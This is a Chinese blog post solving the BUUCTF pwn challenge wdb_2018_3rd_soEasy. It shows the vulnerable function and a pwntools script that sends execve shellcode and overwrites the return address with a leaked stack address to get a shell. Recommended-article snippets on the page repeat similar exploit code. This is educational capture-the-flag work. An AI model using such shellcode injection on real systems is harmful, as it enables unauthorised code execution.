wdb_2018_3rd_soEasy

最新推荐文章于 2024-07-19 11:58:22 发布
最新推荐文章于 2024-07-19 11:58:22 发布
阅读量55 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132485205
版权

wdb_2018_3rd_soEasy

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

32位全没开 ,ez。。,

写shellcode栈执行

ssize_t vul()
{
  char buf[72]; // [esp+0h] [ebp-48h] BYREF

  printf("Hei,give you a gift->%p\n", buf);
  puts("what do you want to do?");
  return read(0, buf, 0x64u);
}

还给了栈地址

写完shellcode再执行栈即可

from pwn import*
from Yapack import *

context(os='linux', arch='i386',log_level='debug')
r,elf=rec("node4.buuoj.cn",28383,"./pwn",10)

ru(b'0x')
leak=int(r.recv(8),16)
li(leak)
pl=b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
pl=pl.ljust(0x48, b'\x00')+p32(0)+p32(leak)
sl(pl)

ia()

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 352
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
wdb_scraper
03-22
【标题】"wdb_scraper" 是一个针对Tutti.ch网站的数据抓取工具,它设计用于从该网站上高效地收集和整理信息。Tutti.ch是一个瑞士的在线市场,用户可以在这里查找各种服务、商品和活动。wdb_scraper帮助数据分析师、...
BUUCTF pwn wp 111 - 115
fa1c4的blog
03-03 368
judgement_mna_2016 actf_2019_babyheap gyctf_2020_signin wdb_2018_3rd_soEasy gyctf_2020_some_thing_interesting
从零开始做题:逆向wdb_2018_3rd_soEasy
weixin_44626085的博客
01-01 903
【代码】从零开始做题:逆向wdb_2018_3rd_soEasy
BUUCTF(pwn)wdb_2018_3rd_soEasy[栈劫持ret2shellcode]
半岛铁盒的博客
04-04 367
没开任何保护,是ret2shellcode题型 from pwn import* context.arch="i386" p=remote("node3.buuoj.cn",25766) p.recvuntil("Hei,give you a gift->") buf_addr=int(p.recv(10),16) shellcode=asm(shellcraft.sh()) payload=shellcode.ljust(0x48+4,'\0')+p32(buf_addr) p.sendline.
[BUUCTF]PWN——wdb_2018_3rd_soEasy(ret2shellcode)
mcmuyanga的博客
03-23 374
wdb_2018_3rd_soEasy 例行检查,32位程序,没有开启任何保护,估计是ret2shellcode 32位ida载入 一开始输buf在栈上的地址,然后存在栈溢出,利用pwntools自动生成shellcode,之后劫持返回地址到buf执行shellcode exp from pwn import * context.arch="i386" p=remote("node3.buuoj.cn",25832) p.recvuntil("Hei,give you a gift->"
PWN-PRACTICE-BUUCTF-30
P1umH0的博客
09-13 149
PWN-PRACTICE-BUUCTF-30suctf_2018_stackwdb_2018_3rd_soEasy[BSidesCF 2019]Runitqctf2018_stack2 suctf_2018_stack 栈溢出,ret2text,返回地址不能直接是next_door的起始地址 设置返回地址为0x40067A,开始设置系统调用的参数以及系统调用号 from pwn import * #context.log_level='debug' #io=process('./SUCTF_2018_sta
BUUCTF-pwn(15)
njh18790816639的博客
02-13 2672
gyctf_2020_some_thing_interesting 经典UAF漏洞! Allocate申请函数! Free释放函数! 全保护开启,故我们利用格式化字符串漏洞泄露libc地址,从而得到malloc_hook地址。然后利用UAF漏洞修改malloc_hook为one_gadget,此时进行申请操作便可获取权限! from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './gyctf_2
BUUCTF刷题7
m0_51251108的博客
11-09 342
题目:护网杯_2018_gettingstart:(浮点数内存表示)starctf_2019_babyshell:(有限制的shellcode)picoctf_2018_buffer overflow 0:[BSidesCF 2019]Runit:(shellcode)wdb_2018_3rd_soEasy:(栈迁移)suctf_2018_stack:(栈平衡) 护网杯_2018_gettingstart:(浮点数内存表示) 参考师傅:护网杯_2018_gettingstart(浮点数内存表示) · 语雀
WDB.zip_vxworks WDB组件_vxworks wdb_wdb
09-22
WDB,全称为Wind River Debug Bridge,是VxWorks系统中一个重要的组件,它提供了强大的远程调试功能,允许开发者在主机上对目标系统的VxWorks应用进行调试。 VxWorks WDB组件的核心功能包括: 1. **远程调试**:...
wdb_graphql
03-15
迷你挑战3-WDB @ FHNE BSc数据科学 作者:卢卡斯·雷伯(Lukas Reber) 使用Django和Graphene构建的GraphQL API。 Selenium Web Scraping脚本(在找到)使用该API来存储和更新数据库中的数据。 由于这只是概念的...
VCS.zip_VCS_synopsys vcs_vcs介绍
09-24
4. **查看结果**:利用波形查看器(如VCS的vcd2wdb转换工具配合 Mentor Graphics的ModelSim进行波形查看)分析仿真结果。 5. **覆盖率分析**:运行后收集覆盖率数据,使用`scover`或`dcov`工具进行覆盖率报告的生成...
KEY2_TEST.zip_altera_cyclone iV_firmware_quartus
09-21
你可能会找到.v(Verilog)、.vhd(VHDL)这样的源代码文件,.qsf(Quartus Settings File)定义项目设置,.sof(System Object File)是经过编译后的配置文件,还有可能包括仿真波形文件(.wdb)、测试激励文件(....
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 553
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 805
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 819
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 835
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
[Linux安全运维] OpenVPN部署
最新发布
Da1NtY的博客
07-19 799
同样的,在创建服务端证书的时候也需要输入一个Common Name用户名,注意与根证书用户名不一样。下载网址: https://github.com/OpenVPN/easy-rsa。2.6.1 将服务端所需的必要文件放到/etc/openvpn/中。2.6.2 将客户端所需的必要文件放到/root/client/中。创建/etc/openvpn/目录,将easy-rsa放进去。签约证书需要输入根证书的密码,与签约服务端证书时的过程一样。在日志文件/var/log/中创建一个openvpn/
怎么把vivao2018.2波形生成的WDB文件导出来
03-29
要将Vivado 2018.2波形生成的WDB文件导出,请按照以下步骤进行操作: 1. 在Vivado中打开波形文件。 2. 点击“File”菜单并选择“Write Waveform Data”。 3. 在弹出的“Write Waveform Data File”对话框中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值